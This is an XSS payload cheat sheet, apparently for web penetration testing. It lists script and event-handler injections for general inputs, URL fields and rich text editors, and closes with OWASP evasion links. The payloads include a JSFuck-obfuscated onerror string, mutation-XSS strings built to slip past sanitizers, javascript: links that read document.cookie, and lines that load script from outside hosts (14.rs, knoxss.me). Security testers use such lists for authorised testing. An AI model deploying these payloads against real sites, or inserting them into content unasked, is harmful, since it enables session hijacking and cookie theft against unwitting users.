===============================Frequently used Payloads start===============================

<base href=//knoxss.me?>
<script src=//14.rs>
'"><script>alert(-1)</script><
m"onmouseover="prompt(-11)
n'onmouseover='prompt(-12)
<video><source src=x onerror=alert(-2)></video>
'"></script><script>alert(0)</script>
'"></script><svg onload=prompt(-3)>
'"><img src=x onerror=alert(-31)>
'"></script><video><source src=x onerror=alert(-4)></video>
<iframe <><a href=javascript&colon;alert(document.cookie)>Click Here</a>=&gt;&lt;/iframe&gt;
<img src=1 onerror="[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()"">
<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
<iframe>
    </iframe><svg onload=alert(-9)>
</iframe>
)</scr<ScRipT>ipt>"><script>alert('XSS')</script>
'><svg/onload=alert(5)>
<div onclick="javascript:alert`-10`" > Click me! </div>
\u0061lert(-11)

=============================== Frequently used Payloads end ===============================

===============================    URL INPUT FIELDS START    ===============================

https://google.com"onmouseover="prompt(1)
https://google.com'onmouseover='prompt(2)
https://www.icloud.com/mail/#<script></script>https://www.icloud.com/onmouseover=location=/javascript:alert%28document.domain%29/.source;//


===============================     URL INPUT FIELDS END     ===============================

=============================== For Rich Text editors start  ===============================

<div><a href="javascript:prompt()">CLICK ME</a> <b>2</b> <base href=//knoxss.me?> <b>2</b> <a href="https://google.com" onmouseover=prompt()">CLICK ME</a></div>

<style></sty</style>
<style>le><script>alert(1)</script></style>
<math><mtext><table><mglyph><style><math><table id="</table>"><img src onerror=alert(-6)">
<math><mtext><table><mglyph><style><math><table id="</table>"><video><source src=x onerror=alert(-7)">

===============================  For Rich Text editors end   ===============================

Useful Links:

https://owasp.org/www-community/xss-filter-evasion-cheatsheet
http://seguretat.wiki.uoc.edu/index.php/XSS_Cheat_Sheet
